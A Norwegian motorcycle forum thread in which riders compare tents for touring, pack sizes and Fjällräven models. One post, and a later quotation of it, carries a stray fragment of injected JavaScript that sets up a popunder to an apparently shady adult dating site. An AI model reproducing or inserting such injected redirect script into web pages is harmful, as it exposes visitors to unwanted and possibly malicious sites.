Telt - hva bør man velge?

... om deler, tilbehør, utstyr, renhold, MC-forsikring, kjøreklær osv. til MC, fører og passasjer.
Brukeravatar
AJ
Administrator
Innlegg: 38035
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Telt, what to choose?

Legg inn av AJ »

ole m. skrev:
AJ skrev:
ole m. skrev:Nei, man ikke det, men det er jo nettopp det som markedsføres, og som du også fremhever her som "perfekt".
God høyde i teltet er fint å ha, så jeg mener ikke at teltet ikke kan være bra.
Øh... Ok... og neivel? :eh
:scratch :dontknow

:mk
Spør gjerne om det var noe du ikke fikk med deg AJ.
:knegg
Ikke nødvendig, overhodet ikke nødvendig...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
JohnnyTh
Innlegg: 3455
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Telt, what to choose?

Legg inn av JohnnyTh »

Kan jo være greit å parkere i telt hvis det er minusgrader. Så slipper man at den er full av snø og is når man skal ut å kjøre.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: Telt, what to choose?

Legg inn av Bringisen »

Kjøpte nok et telt i dag. Synes mitt Helsport Trollspiret 2 Extrem som er et vintertelt bel for varmt om sommeren. Derfor kjøpte jeg et Fjellreven Akka View 2, som er et tre-sesongs telt, men ypperlig om sommeren siden det kan åpnes helt opp.


Bilde

Gleder meg til å få prøvd ut dette teltet. :D

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
Hjernen
Innlegg: 802
Registrert: 14 des 2010, 11:07
Motorsykkelen din: 1996 Honda NTV 650 (Revere)
Sted: Porsgrunn

Re: Telt, what to choose?

Legg inn av Hjernen »

Under Norgestreffet møtte jeg på en kar jeg kjente fra før av som selger dette teltet:

http://no.wolfcamper.com/python.html

Bilde

og det er et telt jeg kommer til å sjekke ut nærmere ja....
Hvis en gjør slik, funker det da tru??

Member of Festus Mc Porsgrunn.

Klubbens hjemmeside er nå oppe å går: http://festusmc.wix.com/homepage
Min youtubekanal: http://www.youtube.com/user/h1ern1?feature=mhee
Photobucket: http://s5.photobucket.com/albums/y176/Hjernen/
Klassisk Honda-forum: http://forum.classichonda.no/index.php
Siste turen er om http://www.7is7.com/otto/countdown.html ... 20sesongen

Brukeravatar
AleksanderRH
Innlegg: 53
Registrert: 01 apr 2013, 13:52
Motorsykkelen din: Kawasaki ZZR 600 1998
Sted: Gursken/Stjørdal

Re: Telt, what to choose?

Legg inn av AleksanderRH »

En grei løsning på drukning i billig-telt kan være å impregnere teltet med spray før man legger av gårde. Ganske rimelig løsning :prop:
Kawasaki ZZR 600 1998

2013: 15340 km. 24/09
2014: PMS

Brukeravatar
JohnnyTh
Innlegg: 3455
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Telt, what to choose?

Legg inn av JohnnyTh »

Bringisen skrev:Kjøpte nok et telt i dag. Synes mitt Helsport Trollspiret 2 Extrem som er et vintertelt bel for varmt om sommeren. Derfor kjøpte jeg et Fjellreven Akka View 2, som er et tre-sesongs telt, men ypperlig om sommeren siden det kan åpnes helt opp.


Bilde

Gleder meg til å få prøvd ut dette teltet. :D

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Hvordan funket dette teltet?

Er det noen andre som har gjort noen telterfaringer i sommer. I nytt telt kanskje.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
Kmann
Innlegg: 504
Registrert: 27 jul 2011, 13:00
Motorsykkelen din: BMW R1150GS -00, BMW K100 RT-85
Sted: Grue i Hedmark

Re: Telt, what to choose?

Legg inn av Kmann »

Jeg tenker: Det der var et fint telt. Men hvis man kjører MC har man plass til litt til, en lavvo av en lette typen med plass for noen flere uten å stable i høyden. Men det forutsetter mulig at man kjører en sykkel som kan bære med litt (BMW GS) og er verdens beste... Da kan man jo campe litt utenfor allfarvei og ;) :lol
Mange som kjører MC, liker det ikke, de kjører fort for å bli fort ferdige med turen.....??
2014 Pr 01.10: 10000 km 01.11: 12000 km

Brukeravatar
SuperMorten
Innlegg: 5292
Registrert: 03 mar 2012, 04:23
Motorsykkelen din: 2005 BMW R 1200 RT
Sted: Åsgårdstrand

Re: Telt, what to choose?

Legg inn av SuperMorten »

Kmann skrev:Jeg tenker: Det der var et fint telt. Men hvis man kjører MC har man plass til litt til, en lavvo av en lette typen med plass for noen flere uten å stable i høyden. Men det forutsetter mulig at man kjører en sykkel som kan bære med litt (BMW GS) og er verdens beste... Da kan man jo campe litt utenfor allfarvei og ;) :lol
Jepp, og vi som ikke har GS har Visa eller Mastercard.. Trenger ikke telt da vel.. :lol
[album]3061[/album] [album]3503[/album][album]4642[/album]

Never Ride Faster Than Your Angel Can Fly

Kjørelengde 2012 - 8500 km
Kjørelengde 2013 - 21449 km
Kjørelengde pr 20.6.2014 - 7259 km

Brukeravatar
JohnnyTh
Innlegg: 3455
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Telt, what to choose?

Legg inn av JohnnyTh »

Kmann skrev:Jeg tenker: Det der var et fint telt. Men hvis man kjører MC har man plass til litt til, en lavvo av en lette typen med plass for noen flere uten å stable i høyden. Men det forutsetter mulig at man kjører en sykkel som kan bære med litt (BMW GS) og er verdens beste... Da kan man jo campe litt utenfor allfarvei og ;) :lol
Hvor mye plass trenger du i teltet ditt? Og hvor mye plass tar en lavo? Er ikke de litt omstendige å slå opp?
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: Telt, what to choose?

Legg inn av Bringisen »

JohnnyTh skrev:
Bringisen skrev:Kjøpte nok et telt i dag. Synes mitt Helsport Trollspiret 2 Extrem som er et vintertelt bel for varmt om sommeren. Derfor kjøpte jeg et Fjellreven Akka View 2, som er et tre-sesongs telt, men ypperlig om sommeren siden det kan åpnes helt opp.


Bilde

Gleder meg til å få prøvd ut dette teltet. :D

[video]http://www.youtube.com/watch?v=rVpSFyq_ ... detailpage[/video]
Hvordan funket dette teltet?

Er det noen andre som har gjort noen telterfaringer i sommer. I nytt telt kanskje.
Det var et veldig bra telt for varmere klima , men innerteltet er kun av myggnetting. Dette gjorde at det trekker en del på snaufjellet. Teltet er genialt når det er varmt.
Jeg solgte det ganske raskt og kjøpte Akka Dome 2 i stedet. Dette teltet er ekstremt vindstabilt og tett , funker som vintertelt om man ikke trenger storm-matter.
Jeg er av den oppfatning at et telt trenger to innganger og to fortelt , i alle fall på et to mannstelt. Dessuten kan man på disse teltene få ekstremt god lufting når man åpner begge "dørene". Flott utsikt er det også.
Jeg er veldig fornøyd med Fjellreven teltene , litt dyre , men jeg synes kvaliteten er veldig god og løsningene likeså. Akkurat som på GS'en :P :p

http://www.fjallraven.no/akka-dome-2" onclick="window.open(this.href);return false;

Bilde

Bilde

Her er en vindtest av teltet , tåler en del vind :P :p

[video]http://www.youtube.com/watch?v=lJD-OI243S0[/video]

Og fikk terningkast 6 i en stor telt test.

http://www.vg.no/reise/artikkel.php?artid=10026187" onclick="window.open(this.href);return false;
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
JohnnyTh
Innlegg: 3455
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Telt, what to choose?

Legg inn av JohnnyTh »

Det var et flott telt. Jeg finner ikke pakkestørrelse noe sted på det Fjellreven teltet, vet du det? For meg som ikke har GS er selvsagt vekt og pakket størrelse det viktigste, siden det er begrenset hva jeg kan ha med meg. Tempesten min er bare 39 x 15 x 15cm og 2,9kg. Men det er litt lite plass, når datteren min er med på tur. Derfor ser jet etter noe som er bitte litt større. Men det må gå ned i toppboksen.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
ejs
Innlegg: 1635
Registrert: 25 jun 2004, 23:52
Motorsykkelen din: Moto Guzzi California EV 1999 modell
Sted: 4645 Nodeland

Re: Telt, what to choose?

Legg inn av ejs »

:thumleft

19x40cm
http://www.fjellsport.no/fjallraven-akk ... green.html" onclick="window.open(this.href);return false;

:prop:
If it ain't broke, I'll break it.

Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: Telt, what to choose?

Legg inn av Bringisen »

JohnnyTh skrev:Det var et flott telt. Jeg finner ikke pakkestørrelse noe sted på det Fjellreven teltet, vet du det? For meg som ikke har GS er selvsagt vekt og pakket størrelse det viktigste, siden det er begrenset hva jeg kan ha med meg. Tempesten min er bare 39 x 15 x 15cm og 2,9kg. Men det er litt lite plass, når datteren min er med på tur. Derfor ser jet etter noe som er bitte litt større. Men det må gå ned i toppboksen.
Ja , ca 40x19x19 og veier ca 3,5 kg. Noen mener det er litt tungt for å være et 2-manns telt på fottur, men jeg synes det er greit. Kvalitet og gode løsninger veier ofte litt mer når det gjelder telt , selv om man finner telt med god kvalitet som bruker dyrere lettvekts materialer.
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
JohnnyTh
Innlegg: 3455
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Telt, what to choose?

Legg inn av JohnnyTh »

Bringisen skrev:
JohnnyTh skrev:Det var et flott telt. Jeg finner ikke pakkestørrelse noe sted på det Fjellreven teltet, vet du det? For meg som ikke har GS er selvsagt vekt og pakket størrelse det viktigste, siden det er begrenset hva jeg kan ha med meg. Tempesten min er bare 39 x 15 x 15cm og 2,9kg. Men det er litt lite plass, når datteren min er med på tur. Derfor ser jet etter noe som er bitte litt større. Men det må gå ned i toppboksen.
Ja , ca 40x19x19 og veier ca 3,5 kg. Noen mener det er litt tungt for å være et 2-manns telt på fottur, men jeg synes det er greit. Kvalitet og gode løsninger veier ofte litt mer når det gjelder telt , selv om man finner telt med god kvalitet som bruker dyrere lettvekts materialer.
tja, det var litt stort. Jeg får klare meg med billigteltet en stund til. og fortsette å lete. Det å finne det rette teltet er som den hellige Gral. Kona mener jeg har nok telt nå så ikke si noe til henne!
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
Kmann
Innlegg: 504
Registrert: 27 jul 2011, 13:00
Motorsykkelen din: BMW R1150GS -00, BMW K100 RT-85
Sted: Grue i Hedmark

Re: Telt, what to choose?

Legg inn av Kmann »

JohnnyTh skrev:
Kmann skrev:Jeg tenker: Det der var et fint telt. Men hvis man kjører MC har man plass til litt til, en lavvo av en lette typen med plass for noen flere uten å stable i høyden. Men det forutsetter mulig at man kjører en sykkel som kan bære med litt (BMW GS) og er verdens beste... Da kan man jo campe litt utenfor allfarvei og ;) :lol
Hvor mye plass trenger du i teltet ditt? Og hvor mye plass tar en lavo? Er ikke de litt omstendige å slå opp?
Nå har ikke jeg lavvo, men de er ikke romstor i pakkinga mener jeg, og rimelig ok å slå opp. Det er jo plass til mye der på liten vekt. Kan jo nesten kjøre inn sykkelen hvis det kniper og..
Mange som kjører MC, liker det ikke, de kjører fort for å bli fort ferdige med turen.....??
2014 Pr 01.10: 10000 km 01.11: 12000 km

Svar